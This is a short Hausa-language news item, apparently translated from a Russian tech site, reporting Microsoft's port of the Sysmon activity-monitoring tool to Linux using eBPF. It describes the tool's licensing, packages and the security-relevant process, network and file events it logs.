Microsoft ya tura sabis ɗin sa ido kan ayyuka a cikin tsarin Sysmon zuwa dandalin Linux. Don saka idanu akan aiki na Linux, ana amfani da tsarin eBPF, wanda ke ba ku damar ƙaddamar da masu aiki da ke gudana a matakin kernel na tsarin aiki. Ana haɓaka ɗakin karatu na SysinternalsEBPF daban, gami da ayyuka masu amfani don ƙirƙirar masu sarrafa BPF don saka idanu abubuwan da ke faruwa a cikin tsarin. Lambar kayan aikin tana buɗe ƙarƙashin lasisin MIT, kuma shirye-shiryen BPF suna ƙarƙashin lasisin GPLv2. Ma'ajiyar kunshin.microsoft.com tana ƙunshe da shirye-shiryen RPM da fakitin DEB waɗanda suka dace da mashahurin rarrabawar Linux.
Sysmon yana ba ku damar adana log tare da cikakkun bayanai game da ƙirƙira da ƙarewar matakai, haɗin yanar gizo da magudin fayil. Log ɗin yana adana ba kawai bayanai na gaba ɗaya ba, har ma da bayanan da ke da amfani don nazarin abubuwan tsaro, kamar sunan tsarin iyaye, hashes na abubuwan da ke cikin fayilolin aiwatarwa, bayanai game da ɗakunan karatu masu ƙarfi, bayanai game da lokacin ƙirƙira / samun dama/canji/ share fayiloli, bayanai game da samun damar kai tsaye na matakai don toshe na'urori. Don iyakance adadin bayanan da aka yi rikodin, yana yiwuwa a saita masu tacewa. Ana iya adana log ɗin ta hanyar daidaitaccen Syslog.
source: budenet.ru